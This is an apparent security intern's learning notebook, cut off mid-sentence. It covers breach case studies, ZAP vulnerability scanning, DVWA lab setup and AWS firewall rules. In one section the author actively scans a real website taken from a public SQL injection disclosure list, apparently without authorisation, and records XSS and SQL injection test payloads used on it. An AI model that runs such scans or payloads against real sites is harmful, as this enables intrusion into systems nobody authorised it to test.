# Intern W1 資安基礎和攻防觀念 # 零、基礎知識補充(校內相關課程知識) ## 一、[已具資料統整(作業系統實務課程相關知識網)](https://hackmd.io/@XianYu/ByBPihH66)💻 ## 二、[已具資料統整(計算機網路課程相關知識網)](https://hackmd.io/@XianYu/SyooMmOaT)💻 # 零、推薦 & 常用網站 ## 一、[Hitcon,繁體中文漏洞列表](https://zeroday.hitcon.org/vulnerability) -->攻擊介紹 ![image](https://hackmd.io/_uploads/ByaZ-5B6p.png) ## 二、[Exploit database](https://www.exploit-db.com/) --> 攻擊腳本(可在VM上運行) ![image](https://hackmd.io/_uploads/Hk28Z9r6T.png) ## 三、[IPinfo](https://ipinfo.io/) --> 可以查詢目前ip ![image](https://hackmd.io/_uploads/SkNAZcrap.png) ## 四、[CVE 漏洞分級](https://cve.mitre.org/index.html) --> 可以查詢不同的CEV事件與List編號搜尋 ![image](https://hackmd.io/_uploads/HkX2MqHpT.png) ## 五、[MITRE ATT&CK](https://attack.mitre.org/matrices/enterprise/) --> 可以看到不同的Attack種類、階段 ![image](https://hackmd.io/_uploads/B1wbQ5Sap.png) ## 六、[OSCP Certification](https://www.offsec.com/courses/pen-200/) > 參考: [[Day6] 滲透測試證照 - OSCP 小分享](https://ithelp.ithome.com.tw/articles/10269099) > 參考: [從菜雞到OSCP](https://ewater.medium.com/%E5%BE%9E%E8%8F%9C%E9%9B%9E%E5%88%B0oscp-ce206e9137e7) # 壹、資安基本知識(link 總整理) ## 一、[Day 4 : 觀念篇 - 常見的資安攻擊類型有哪些?](https://ithelp.ithome.com.tw/articles/10293786?sc=pt) ## 二、[Open Web Application Security Project( OWASP) Top 10](https://www.owasptopten.org/): 2024 十大網站安全威脅 # 貳、[三十篇資安實例分享及解析](https://ithelp.ithome.com.tw/users/20107482/ironman/1968) ## 一、資料統整(易讀)💻 [internW1 【三十篇資安實例分享及解析】 概要與延伸資料查詢 –- 案例擷取](https://hackmd.io/@XianYu/rJmy4nSa6) ## 二、相關資源網站 ### [美國網路安全公司火眼FireEye](https://www.trellix.com/) # 參、案例分析 ## 一、司法院遭駭 * 新聞來源: [遭駭客入侵!傳民眾個資+機敏資料全曝光…司法院回應了](https://www.ctwant.com/article/297204?utm_source=yahoo&utm_medium=rss&utm_campaign=297204) (1)**事件**:司法院遭到駭客入侵,導致大量民眾個資、判決書、各機關資料被駭客取得,並在Telegram上公開。 (2)**被攻擊單位**:司法院資訊處 (3)**系統**:司法院網站資料庫系統 (4)**時間**:2023/04/03 (5)**攻擊方式**:SQL injection (6)**調查進度**:僅回覆「資安無虞」,無該報導所指內網密碼、判決書被公開、依「資通安全事件通報及應變辦法」規定通報,之後確認受駭主機為民眾查詢機主機,且無民眾註冊帳號、沒儲存裁判書 (7)**後續處理**:立即採取變更密碼、設定主機防火牆規則、禁止該台主機對外連線,禁止其餘主機連入等措施,也重建新主機 ### 1. [[Postx1] 攻擊行為-SQL 資料隱碼攻擊 SQL injection](https://ithelp.ithome.com.tw/articles/10189201) ### 2. [網站安全🔒 一次看懂 SQL Injection 的攻擊原理 — 「雍正繼位之謎」](https://medium.com/@jaydenlin/%E6%B7%BA%E8%AB%87%E9%A7%AD%E5%AE%A2%E6%94%BB%E6%93%8A-%E7%B6%B2%E7%AB%99%E5%AE%89%E5%85%A8-%E4%B8%80%E6%AC%A1%E7%9C%8B%E6%87%82-sql-injection-%E7%9A%84%E6%94%BB%E6%93%8A%E5%8E%9F%E7%90%86-b1994fd2392a) ## 二、戶政資料遭駭 * 新聞來源: [「OKE」兜售2357萬餘筆我國戶政個資疑流向中國 通緝中籍駭客](https://news.ltn.com.tw/news/society/breakingnews/4455989) (1)**事件**:OKE在國外駭客論壇BreachForums開價兜售我國2357萬餘筆戶役政資料,導致個資外洩 (2)**被攻擊單位**:台灣戶政事務所 (3)**系統**:台灣戶政事務所資料庫系統 (4)**時間**:2022/10/21犯案、2023/6月底搜索 (5)**攻擊方式**:向境外駭客以虛擬通貨交易方式購買國人個資,並在BreachForums兜售 (6)**調查進度**:檢調將鄭男的電腦送交調查局資安站進行數位鑑識,確認鄭男於收購個資以後,長達8個月的期間,並無外洩相關個資,緩起訴 (7)**後續處理**:BreachForums論壇已被美方查抄關站。而國人的個資如何外流,是否仍有其他還未曝光的買家,檢調仍持續追查中 ## 三、iRent資料庫暴露 * 新聞來源: [iRent資料庫暴露於公開網路不設防,引發大眾關注,配置錯誤問題應受更多重視](https://www.ithome.com.tw/news/155392) * 科技媒體TechCrunch報導 [Hotai Motor exposed thousands of iRent customer documents](https://techcrunch.com/2023/01/30/hotai-motor-exposed-irent-customer-data/) * 資料庫不設防的曝險或資料外洩的事件 延伸案例 [iRent資料庫因不當配置導致資料外洩或曝險,並非資安新議題,國內企業需汲取教訓避免問題一再重演](https://www.ithome.com.tw/news/155393) (1)**事件**:iRent資料庫暴露及資安漏洞事件,潛在影響客戶有40.01萬人 (2)**被攻擊單位**:和雲行動服務公司,旗下共享汽車業務iRent (3)**系統**:iRent的資料庫系統 (4)**時間**:2023/1/31揭露、在2月1日及2月4日分別發布聲明公告。 (5)**攻擊方式**:資料庫不設防的曝險導致的資料外洩 * 資料庫的存取上,業者未適當阻擋外部連線,沒有設定密碼進行保護,且任何使用網際網路的人只要知道系統的IP位址就能存取iRent客戶資料庫。存取上存在嚴重的不安全因素。(資料庫暴露) * 資料庫的資料儲存上,是否有加密保護,像是欄位加密、備份檔加密、透明資料加密與永遠加密,以及加密的安全等級? * 上傳的身分證明文件的儲存,就只有編碼(Encode),並沒有加密(Encrypt) (6)**調查進度**:在1月28日接獲通報並於一小時內完成因應,初步調查是記錄應用程式Log檔的暫存資料庫 (7)**後續處理**:對可能洩密當事人(消費者)通知狀況、事後處理與矯正行為、執行主機系統弱點掃描及滲透測試,針對App源碼掃描,交易過程採用SSL安全加密與加殼處理,似乎都**沒有**對應到這次事件的根本問題 ## 四、LastPass密碼備份和加密金鑰已洩漏 * 新聞來源: [LastPass母公司GoTo證實用戶密碼備份和加密金鑰已洩漏](https://www.ithome.com.tw/news/155264) * 調查報告: [LastPass發現駭客盜走用戶加密密碼庫](https://www.ithome.com.tw/news/154862) (1)**事件**:LastPass母公司GoTo的資安事件, * 1. 用戶密碼備份和加密金鑰遭到竊取(駭客入侵開發環境,已經複製客戶加密密碼庫) * 2. 公司被盜走程式碼和私有技術(256位元AES加密) (2)**被攻擊單位**: (3)**系統**:涉及多個產品,包括IT管理工具Central、遠端存取和管理軟體Pro、線上會議工具`join.me`、網路虛擬化和VPN服務Hamachi,以及遠端存取和管理軟體RemotelyAnywhere (4)**時間**:2022年11月偵測到開發環境和第三方雲端儲存服務存在異常活動、2022/11/30在公司blog向user公布、2022年12月完成調查報告 (5)**攻擊方式**: * 暴力解竊取加密資料 * 攻擊者透過第三方雲端儲存服務,竊取用戶的密碼備份和加密金鑰 * 包含了帳戶名稱、經處理過的密碼和多因素身分驗證配置等資料 (6)**調查進度**: 公司進行了調查,委託資安公司Mandiant協助,發現攻擊者主要透過IT管理工具、遠端存取軟體和線上會議工具相關的第三方雲端服務進行攻擊。攻擊者已經取得加密備份使用的金鑰 警告用戶和通知執法單位,也委請資安公司Mandiant協助調查。 (7)**後續處理**: 1. 對所有帳戶密碼都採取加鹽和雜湊處理 2. 重置受影響用戶的密碼或是MFA設定 3. 將帳戶搬遷到更安全的身分管理平臺上 4. 完全停用該環境,並且重新建立開發環境 5. 強化開發人員機器、流程和身份驗證機制 6. 添加額外的日誌紀錄和警示功能,以檢測未經授權的活動 7. 官方也積極輪換所有可能受影響的憑證和證書,補充現有端點安全性。 (8)**類似案例--竊取雲端資料**: [三十篇資安實例分享及解析DAY 17--嫌犯利用民眾設定密碼習性,破解Google雲端竊取個資,轉走銀行存款](https://ithelp.ithome.com.tw/articles/10205054) ## 五、Okta客戶資料洩漏 * 新聞來源: [Okta對10月遭駭事件完成調查,134位客戶資料被洩漏](https://www.ithome.com.tw/news/159667) * [Okta支援案件管理系統遭駭客入侵,股價大跌11%](https://www.ithome.com.tw/news/159430) (1)**事件**:Okta遭受駭客入侵事件,導致134位客戶的檔案資料被洩漏,並有5個客戶的對話資料被劫持。 (2)**被攻擊單位**:Okta (3)**系統**:Okta的登入身分管理系統、Cloudflare系統 (4)**時間**:2023/09/29開始調查、2023/10/13,16鎖定被竊取服務帳戶、Cloudflare 2023/10/18被入侵 (5)**攻擊方式**: * 駭客利用遭盜的憑證來存取該公司的支援案件管理系統 * 被竊內容包含對話令牌(Session Token)的HAR(HTTP Archive)檔案 (6)**調查進度**: * 調查,評估了與支援案例相關的日誌,並藉由合作夥伴提供的IP位置線索,確認了與受駭帳戶相關的額外檔案存取事件。 * 猜測,被攻擊者竊取的服務帳戶擁有查看和更新客戶支援檔案的權限 * 調查,安全團隊發現一名員工在Okta管理的筆電上,於Chrome瀏覽器登入了個人的Google帳號 * 推論,可能因為員工個人Google帳戶或是裝置被盜,導致服務帳戶洩漏 * 包含對話令牌(Session Token)的HAR(HTTP Archive)檔案 (7)**後續處理**: * Okta已停用受入侵的服務帳戶。 * 封鎖了在Chrome中登入個人Google帳戶的權限。 * 在客戶支援系統部署了額外的監控規則。 * Okta管理員對話Token現在可以綁定網路位置,提高安全性。 ## 六、台達電遭駭 * 新聞來源: [【資安日報】2022年1月28日,台達電疑遭勒索軟體Conti攻擊、駭客收集存在Log4Shell的VMware遠距工作平臺名單](https://www.ithome.com.tw/news/149136) * [Taiwanese Apple and Tesla contractor hit by Conti ransomware](https://www.bleepingcomputer.com/news/security/taiwanese-apple-and-tesla-contractor-hit-by-conti-ransomware/) * [台達電被駭遭勒索4.1億元 估約1.35萬台電腦被加密](https://www.ctwant.com/article/165246) * [Initial Access Brokers (IAB): What You Need to Know](https://securityboulevard.com/2023/11/initial-access-brokers-iab-what-you-need-to-know/) * [Log4U, Shell4Me](https://blogs.blackberry.com/en/2022/01/log4u-shell4me) 參考資料 (1)**事件**:台達電疑似遭到Conti勒索軟體攻擊,有報導指出台達電的6萬5千臺電腦中有1千5百臺伺服器與1萬2千臺電腦被加密,勒索1500萬美元(約新台幣4.12億元) (2)**被攻擊單位**:台達電(Delta Electronics) (3)**系統**:公司網站、營運相關系統 (4)**時間**:2022年1月21日中毒 (5)**攻擊方式**:勒索病毒 * 遭到 Conti 勒索軟體攻擊,內部網路的伺服器和電腦被加密。 * Visibility:這些細節是由 AdvIntel“Andariel”平台發現的,該平台提供對抗性可見性。 * The attack revealed a specific pattern. * Cobalt Strike:攻擊者使用 Cobalt Strike(一種流行的後利用工具)來取得受害者網路的存取權限並保持控制權。 * Atera:固定模式----採用遠端管理代理程式(Atera 或 AnyDesk)來實現持久性。 ![image](https://hackmd.io/_uploads/rJSiarO66.png) > Delta Conti ransom note Delta Electronics Conti 贖金票據 (BleepingComputer) (6)**調查進度**: * 2022/01/18 AdvIntel "Andariel" platform 偵測到攻擊 * 2022/01/28 17:00,該公司網站仍無法運作 (7)**後續處理**: * 台達電表示已委託趨勢科技與微軟資安團隊進行調查 (8)**類似案例**: [Apple supplier Quanta hit with $50 million ransomware attack from REvil](https://www.bing.com/search?q=REvil+Quanta&cvid=c2221a3fdcf94d5e892e3dc8a1a50631&gs_lcrp=EgZjaHJvbWUyBggAEEUYOTIHCAEQRRj8VdIBCDE2NTFqMGo0qAIAsAIA&FORM=ANAB01&PC=U531) --- # W2 漏洞掃描 # 壹、Task: 創建EC2 VM 並使用GUI,下載ZAP 連結error ![image](https://hackmd.io/_uploads/HJqm-LKAa.png) ` C:\Users\iris.yu>ssh -i "C:\Users\iris.yu\Downloads\cyber-key.pem" cyber@52.43.108.217 The authenticity of host '52.43.108.217 (52.43.108.217)' can't be established. ECDSA key fingerprint is SHA256:xlvBpMD5XJZU9It4KOvg3i9/79Ld/8qPVkqQ/KhiijI. Are you sure you want to continue connecting (yes/no/[fingerprint])? yes Warning: Permanently added '52.43.108.217' (ECDSA) to the list of known hosts. cyber@52.43.108.217: Permission denied (publickey,gssapi-keyex,gssapi-with-mic). ` * 好像不是僅限於EC2的問題 ### Reference > 1. [The authenticity of host can't be established](https://stackoverflow.com/questions/11443687/the-authenticity-of-host-cant-be-established) > 2. [Authenticity of host can't be established in AWS ssh](https://stackoverflow.com/questions/11443687/the-authenticity-of-host-cant-be-established) > 3. [Git says "Warning: Permanently added to the list of known hosts"](https://stackoverflow.com/questions/9299651/git-says-warning-permanently-added-to-the-list-of-known-hosts) ### 解法 * 注意: **ec2-user不能改掉**!!! ![image](https://hackmd.io/_uploads/HJQ_WLt0a.png) ### 桌面GUI介面工具 > 1. [How To Set Up GUI On Amazon EC2 Ubuntu server](https://stackoverflow.com/questions/25657596/how-to-set-up-gui-on-amazon-ec2-ubuntu-server) > 2. [Configure the Amazon Linux 2 MATE desktop connection](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/amazon-linux-ami-mate.html) ## 遇到問題: Linux Command not found 遇到問題: Command not found ![image](https://hackmd.io/_uploads/rkC7FGYRT.png) ### 降版本: 不選2023 image > [How To Set Up GUI On Amazon EC2 Ubuntu server](https://repost.aws/knowledge-center/ec2-linux-2-install-gui) ![image](https://hackmd.io/_uploads/HkZa7XhT6.png) ![image](https://hackmd.io/_uploads/r1Q1VQhp6.png) ![image](https://hackmd.io/_uploads/rJA1Nm3pa.png) * 注意: 可以直接用ec2 instance 的connect開啟 bash 命令欄 ![image](https://hackmd.io/_uploads/r106YGKAp.png) ## Ubuntu解法---跟著網站step by step * 這個系列感覺不錯!! > [【 Cloud 】使用遠端桌面連到 AWS Ubuntu VM](https://learningsky.io/remote-desktop-connect-aws-ubuntu-vm/) * 記得開遠端桌面 3389 port才可以使用!!! * 裡面的步驟注意: sudo netstat -plnt | grep rdp 接聽,中間記得要加 `sudo apt update` `sudo apt install net-tools` * 成功開啟ubuntu ![image](https://hackmd.io/_uploads/H10U7E3p6.png) ### 網路問題 網路測試 `ping www.google.com` ![image](https://hackmd.io/_uploads/rko75MY06.png) `ip a` ![image](https://hackmd.io/_uploads/SynrqMKA6.png) ### 有網路,但是瀏覽器初始無法打開 * 將User 變為super user `sudo su` `visudo` `iris ALL=(ALL:ALL) ALL` 中間的空格是tab,要注意 * vi用法 [vi 的使用](https://dywang.csie.cyut.edu.tw/dywang/linuxProgram/node4.html) 修改vi 文件 ![image](https://hackmd.io/_uploads/S1BkyShTp.png) 1. 下載google安裝檔 `wget https://dl.google.com/linux/direct/google-chrome-stable_current_amd64.deb ` 2. 解壓縮 `sudo dpkg -i google-chrome-stable_current_amd64.deb ` 3. 運行錯誤排除 `sudo apt-get install -f` 4. 執行 ` google-chrome ` * 連上Google了!!! > [GPT Ubuntu Google](https://chat.openai.com/share/cd4e650d-646f-4a2b-9920-f94885b75e64) ![image](https://hackmd.io/_uploads/H11hGS2pa.png) ### 下載[OWASP ZAP](https://www.zaproxy.org/) 相關資訊 [Day22_掃描 OWASP ZAP](https://ithelp.ithome.com.tw/articles/10249892?sc=hot) ### RAM 爆掉了 * 可能是因為同時載了Google然後要載ZAP的時候導致Crash --> Connect也連不上了 ![image](https://hackmd.io/_uploads/B1a6IHhTa.png) ![image](https://hackmd.io/_uploads/H1h7_S26T.png) # 貳、下載 & 使用 ZAP ### 重新開ec2 xlarge來解決 重複上述步驟 * 安裝java 1. 下載 ` sudo apt-get update ` ` sudo apt-get install openjdk-11-jdk ` 2. 設定環境變量 * `update-alternatives --config java` * `export JAVA_HOME=/usr/lib/jvm/java-11-openjdk-amd64 # 預設路徑應該相同 export PATH=$PATH:$JAVA_HOME/bin` * 下載ZAP ![image](https://hackmd.io/_uploads/SJiyBL266.png) 1. 到網頁[ZAP Downloads](https://www.zaproxy.org/download/)下載Linux packages 2. 解壓縮檔案 `tar -zxvf ZAP_2.14.0_Linux.tar.gz` (中間可以換成: `tar -zxvf `後面接到Downloads裡面複製檔案名貼上) * ZAP運作 1. `cd ZAP_2.14.0` 2. `./zap.sh` * 成功開啟 ![image](https://hackmd.io/_uploads/rkc9EL3aT.png) # 參、漏洞掃描---ZAP操作 ## 一、相關reference > 參見: [Day22_掃描 OWASP ZAP](https://ithelp.ithome.com.tw/articles/10249892?sc=hot) > 參見:[OWASP ZAP掃描工具,入門安裝和操作 ](https://ithelp.ithome.com.tw/articles/10313098) > 參見:[網頁滲透測試 OWASP ZAP](https://medium.com/@jieshiun/%E7%B6%B2%E9%A0%81%E6%BB%B2%E9%80%8F%E6%B8%AC%E8%A9%A6-owasp-zap-60f03b8d340d) > 參見: [安全性測試:OWASP ZAP 2.8 使用指南(一):安全測試基礎及ZAP下載、安裝](https://www.twblogs.net/a/5d846be4bd9eee541c34a162) > 參見:[網頁安全性測試:OWASP ZAP使用入門 ](https://www.tpisoftware.com/tpu/articleDetails/2161) ## 二、Hitcon找範例 * 去[Hitcon](https://zeroday.hitcon.org/vulnerability/disclosed/page/2) --> 公開,找可攻擊網址 * 測試: [王子網球教學訓練營官網存在SQL Injection漏洞](https://zeroday.hitcon.org/vulnerability/ZD-2023-01051) ## 三、漏洞分析實作 * 開啟Auto Scan 輸入URL --> Attack ![image](https://hackmd.io/_uploads/BJQybqATT.png) * 按下Attack後,Active Scan --> 儀錶板icon -->可以看到掃描進度圖表(掃描進度詳細資訊) ![image](https://hackmd.io/_uploads/Hk9H1jAa6.png) * 上方是程式具體指令輸入 * 下方是攻擊(漏洞)種類統整 ![image](https://hackmd.io/_uploads/BkH5XtR6a.png) * Generate report可以生成報告 * Templete可以改成pdf ![image](https://hackmd.io/_uploads/HyUUcY0TT.png) ![image](https://hackmd.io/_uploads/S1wt9FC6T.png) # 肆、漏洞分析 * Alive Scan 統整 ![image](https://hackmd.io/_uploads/BJrDMjCap.png) ![image](https://hackmd.io/_uploads/H1S-msRap.png) * Alerts統整 ![image](https://hackmd.io/_uploads/r1nH7iR6a.png) ## 一、CSS(Cross Site Scripting) ### 1. Alert ![image](https://hackmd.io/_uploads/r1oWN9AaT.png) ### 2. 攻擊測試 * 根據Alert欄位在搜尋欄輸入`'"<scrIpt>alert(1);</scRipt>` ![image](https://hackmd.io/_uploads/rkromcRa6.png) * 顯示錯誤 ![image](https://hackmd.io/_uploads/H1bAXqCTT.png) ![image](https://hackmd.io/_uploads/SkoRm506a.png) ### 3. Reference 1. [CSS問題](https://cwe.mitre.org/data/definitions/79.html) 2. [Cross Site Scripting](http://projects.webappsec.org/w/page/13246920/Cross%20Site%20Scripting) ## 二、漏洞分析---SQL Injection ### 1. Alert ![image](https://hackmd.io/_uploads/rJ0x3tAT6.png) ### 2. 測試 * 根據Alert欄位在搜尋欄輸入`12' AND '1'='1' -- ` ![image](https://hackmd.io/_uploads/BkdZRtCpa.png) * 顯示錯誤 ![image](https://hackmd.io/_uploads/r11SAFApT.png) ### 3. Reference * Alert 顯示 1. [SQL Injection Prevention Cheat Sheet](https://cheatsheetseries.owasp.org/cheatsheets/SQL_Injection_Prevention_Cheat_Sheet.html) ## 三、PDF報告 ![image](https://hackmd.io/_uploads/r18A_nCa6.png) ## 三、漏洞分析 ![image](https://hackmd.io/_uploads/r1Hfq6AT6.png) # 伍、其他設定 ## 一、切換Region * 現在有一台在us-west 2的xlarge ![image](https://hackmd.io/_uploads/BJkkI5R6T.png) * 還有一台在Tokyo的xLarge ![image](https://hackmd.io/_uploads/ryWQU90p6.png) ## 二、Softether VPN [How to Set Up SoftEther VPN Server on Ubuntu 22.04/20.04](https://www.linuxbabe.com/ubuntu/set-up-softether-vpn-server) * 安裝 9798 版本 ![image](https://hackmd.io/_uploads/S1vUPR06T.png) ![image](https://hackmd.io/_uploads/Hk-vvCATT.png) ### 做到make以後,報錯 ![image](https://hackmd.io/_uploads/HJcxdCR6a.png) `cd vpnserver/ bash: cd: vpnserver/: No such file or directory ` ### 下載Github Bridge > 參見: [SoftEtherVPN / SoftEtherVPN_Stable](https://github.com/SoftEtherVPN/SoftEtherVPN_Stable/releases/) ![image](https://hackmd.io/_uploads/Hyi1lkJRp.png) --- # 滲透測試 ### 注意💡: Ubuntu虛擬機連線本機端SSH要改成`ubuntu@<public ip>`,而不是ec2-user ![image](https://hackmd.io/_uploads/H1UPsVbAa.png) * 也可以從AWS --> instance --> connect --> SSH user觀看格式範例 ![image](https://hackmd.io/_uploads/Sys2ofKAa.png) # 零、Docker下載 > 參見: [DAY 20 - 連接到 EC2 instance 並下載 Docker](https://ithelp.ithome.com.tw/articles/10334594) * `sudo apt update` ![image](https://hackmd.io/_uploads/rJY1hMt0a.png) * `sudo apt install apt-transport-https ca-certificates curl software-properties-common` ![image](https://hackmd.io/_uploads/S1Hf2MtA6.png) * `curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -` ![image](https://hackmd.io/_uploads/rkB7Ay410.png) * `sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" ` ![image](https://hackmd.io/_uploads/SJZdyeNk0.png) * `sudo apt update` ![image](https://hackmd.io/_uploads/rkRqkg4yC.png) * `apt-cache policy docker-ce` ![image](https://hackmd.io/_uploads/SJFJxgEkA.png) * `sudo apt install docker-ce` ![image](https://hackmd.io/_uploads/rkK0yHZ06.png) ![image](https://hackmd.io/_uploads/ryJZeH-Aa.png) * `sudo docker --version` ![image](https://hackmd.io/_uploads/By5GeBbCa.png) * 把帳號加入權限: `whoami` `sudo usermod -a -G docker ubuntu` ![image](https://hackmd.io/_uploads/S1WcxH-Rp.png) * 測試Docker開啟: `sudo service docker start` `sudo docker ps` ![image](https://hackmd.io/_uploads/Byw5ZrWR6.png) # W3 滲透測試 # 壹、DVWA * [Github digininja/DVWA](https://github.com/digininja/DVWA) ## 一、EC2 建立 Docker > 參見: [DAY 20 - 連接到 EC2 instance 並下載 Docker](https://ithelp.ithome.com.tw/articles/10334594) * `sudo apt update` ![image](https://hackmd.io/_uploads/HkXa0NZ06.png) * `sudo apt install apt-transport-https ca-certificates curl software-properties-common` ![image](https://hackmd.io/_uploads/HJHGySbCp.png) * `curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add -` ![image](https://hackmd.io/_uploads/Sy9BkSZ0T.png) * `sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" ` ![image](https://hackmd.io/_uploads/ryr_krWCp.png) * `sudo apt update` ![image](https://hackmd.io/_uploads/BkrtJSWRT.png) * `apt-cache policy docker-ce` ![image](https://hackmd.io/_uploads/HJboJrW0T.png) * `sudo apt install docker-ce` ![image](https://hackmd.io/_uploads/rkK0yHZ06.png) ![image](https://hackmd.io/_uploads/ryJZeH-Aa.png) * `sudo docker --version` ![image](https://hackmd.io/_uploads/By5GeBbCa.png) * 把帳號加入權限: `whoami` `sudo usermod -a -G docker ubuntu` ![image](https://hackmd.io/_uploads/S1WcxH-Rp.png) * 測試Docker開啟: `sudo service docker start` `sudo docker ps` ![image](https://hackmd.io/_uploads/Byw5ZrWR6.png) ## 二、Docker 下載 DVWA pre-built image ![image](https://hackmd.io/_uploads/SkNMmrb0T.png) > 下載網址參照: [DVWA pre-built image.](https://github.com/digininja/DVWA/pkgs/container/dvwa) * 輸入指令: `sudo docker pull ghcr.io/digininja/dvwa:1232568` ![image](https://hackmd.io/_uploads/ByRVQHW0T.png) ### 備註: Double check: docker / docker compose * `sudo docker compose version` * `sudo docker version` ![image](https://hackmd.io/_uploads/BybsEH-Cp.png) ## 三、安裝 DVWA ### 指令 ![image](https://hackmd.io/_uploads/ry6CBBWRT.png) ![image](https://hackmd.io/_uploads/SJN06FbCa.png) * `wget https://raw.githubusercontent.com/IamCarron/DVWA-Script/main/Install-DVWA.sh` ![image](https://hackmd.io/_uploads/ryFr8BZ0T.png) * `chmod +x Install-DVWA.sh` * `sudo ./Install-DVWA.sh` ### 成功執行!! ![image](https://hackmd.io/_uploads/r18P8rZRp.png) 安裝過程跑完後:中間可以設置密碼,按enter等於設定不用密碼 ![image](https://hackmd.io/_uploads/BkGpvB-CT.png) * 設定完後可以從`http://localhost/DVWA/login.php`登入剛剛設定的帳號與密碼 ![image](https://hackmd.io/_uploads/B1Z9F8-Aa.png) * 登入畫面: ![image](https://hackmd.io/_uploads/HJ8ptUWA6.png) * 記得登入的預設帳號跟密碼是 帳號: admin 密碼: password ![image](https://hackmd.io/_uploads/SJEl0I-A6.png) # 貳、DVWA環境設置 > MySQL 步驟參考: [實戰工作坊 — — DVWA(Damn Vulnerable Web Application)](https://lin19921127.medium.com/%E5%AF%A6%E6%88%B0%E5%B7%A5%E4%BD%9C%E5%9D%8A-dvwa-damn-vulnerable-web-application-253f1b11fa8a#:~:text=DVWA%EF%BC%88Damn%20Vulnerable,Web%20Application%EF%BC%89%E6%98%AF%E4%B8%80%E5%80%8B%E7%94%A8%E4%BE%86%E9%80%B2%E8%A1%8C%E5%BC%B1%E9%BB%9E%E5%AE%89%E5%85%A8%E6%B8%AC%E8%A9%A6%E7%9A%84%E7%B6%B2%E7%AB%99%E7%B3%BB%E7%B5%B1%EF%BC%8C%E6%97%A8%E5%9C%A8%E7%82%BA%E5%AE%89%E5%85%A8%E5%B0%88%E6%A5%AD%E4%BA%BA%E5%93%A1%E6%B8%AC%E8%A9%A6%E8%87%AA%E5%B7%B1%E7%9A%84%E5%B0%88%E6%A5%AD%E6%8A%80%E8%83%BD%E5%92%8C%E5%B7%A5%E5%85%B7%E6%8F%90%E4%BE%9B%E5%90%88%E6%B3%95%E7%9A%84%E7%92%B0%E5%A2%83%EF%BC%8C%E5%B9%AB%E5%8A%A9web%E9%96%8B%E7%99%BC%E8%80%85%E6%9B%B4%E5%A5%BD%E7%9A%84%E7%90%86%E8%A7%A3web%E6%87%89%E7%94%A8%E5%AE%89%E5%85%A8%E9%98%B2%E7%AF%84%E7%9A%84%E9%81%8E%E7%A8%8B%E3%80%82) > DVWA使用說明參考: [渗透初识之DVWA靶场搭建及使用(详细图文)](https://blog.csdn.net/m0_60884805/article/details/127086871) ## 一、MySQL * `sudo mysql` ![image](https://hackmd.io/_uploads/BkDqRU-0p.png) * `create user ‘dvwa’@’localhost’ identified by '';` ![image](https://hackmd.io/_uploads/SyK7JD-C6.png) * `select user, host, password from mysql.user;` ![image](https://hackmd.io/_uploads/Sy3i1vWCp.png) * `grant all privileges on *.* to ‘dvwa’@’localhost’ ; ` ![image](https://hackmd.io/_uploads/B1UexDZAa.png) * `flush privileges;` ![image](https://hackmd.io/_uploads/rkSNlPW0p.png) * 離開MySQL: `\q` ![image](https://hackmd.io/_uploads/BJ4jgwZAa.png) ## 二、側邊欄功能簡介(環境設置) ### 1. Setup/ResetDB 登入後在側邊攔選擇 Setup/ResetDB --> 可以按下"Create/Reset DB"按鈕來創建新的DB ![image](https://hackmd.io/_uploads/S1x3WwZ06.png) ### 2. DVWA Security 可以設置攻克難度,代表挑戰難度 ![image](https://hackmd.io/_uploads/S1odGv-AT.png) 難度說明 ![image](https://hackmd.io/_uploads/S1hlhDZ0a.png) # 防禦策略與防火牆設定 # 壹、參考資料 > 參考: 公司上櫃資訊內控審計之準備 [2010 iT 邦幫忙鐵人賽 IT上櫃心法](https://ithelp.ithome.com.tw/users/20000375/ironman/180) > 參考: [[IT上櫃心法]-22.防火牆設定](https://ithelp.ithome.com.tw/articles/10056261) > 參考: [Stateful vs. Stateless Firewall ](https://www.linkedin.com/pulse/stateful-vs-stateless-firewall-rajneesh-gupta-df8kf/)參考: [什麼是下一代防火牆 (NGFW)?](https://www.cloudflare.com/zh-tw/learning/security/what-is-next-generation-firewall-ngfw/) ## 一、雲端 > 參考: [無限手套 AWS 版:掌控一切的 5 + 1 雲端必學主題](https://ithelp.ithome.com.tw/users/20100951/ironman/4671) > [Amazon Cloud Service 30 days challenge](https://ithelp.ithome.com.tw/users/20083507/ironman/1366) ## 二、連線 > 參考: [AWS VPC NACL](https://medium.com/@bayaansanni/aws-vpc-nacl-58d414efc328) # 貳、實作步驟 > 參考: [AWS — 學習筆記(1) Deploy ENV/EC2](https://medium.com/jacky-life/aws-%E5%AD%B8%E7%BF%92%E7%AD%86%E8%A8%98-1-deploy-env-ec2-ea5e5f56d936) > 參考:[AWS — 學習筆記(2) NAT/Container Service](https://medium.com/jacky-life/aws-%E5%AD%B8%E7%BF%92%E7%AD%86%E8%A8%98-2-nat-container-service-e23d78f1ab55) > 參考:[AWS — 學習筆記(3) Deploy ELB](https://medium.com/jacky-life/aws-%E5%AD%B8%E7%BF%92%E7%AD%86%E8%A8%98-3-deploy-elb-2b0d86c776f7) ## 一、使用預設VPC、創建Subnet Group 目前: Security group + public subnet, 裡面有兩個EC2 (僅只有下圖的左半Security Group,沒有建立Private subnet) ![image](https://hackmd.io/_uploads/SJBrg0cAa.png) > 參考:[AWS — 學習筆記(2) NAT/Container Service](https://medium.com/jacky-life/aws-%E5%AD%B8%E7%BF%92%E7%AD%86%E8%A8%98-2-nat-container-service-e23d78f1ab55) ### 目前 Resource Map ![image](https://hackmd.io/_uploads/HyJUNA506.png) ## 二、建立NACL(Netwarks ACL) VPC --> Netwark ACLs --> Create network ACL ![image](https://hackmd.io/_uploads/Hkff7A906.png) ## 三、設置Inbound ### 原本是denined all,要新增其他rules 來allow ![image](https://hackmd.io/_uploads/ryifA65R6.png) * All traffic * All TCP * Custom TCP+ port: 1024-49151(若寫0-65535則等於All TCP) * RDP --> 遠端桌面連線 * SSH(Security Shell) * ICMP --> Ping, 網路探測, 錯誤報告 * HTTP * HTTPS ### Port知識補充 TCP 協議中的端口號範圍是從 0~65535。這個範圍中的端口號被分為三個部分:(若寫0-65535則等於All TCP) 1. **知名端口(Well-known Ports)**:這些端口號範圍從 0 到 1023。知名端口通常是一些廣泛使用的服務所使用的,例如 HTTP 服務(端口 80)和 HTTPS 服務(端口 443)。 2. **註冊端口(Registered 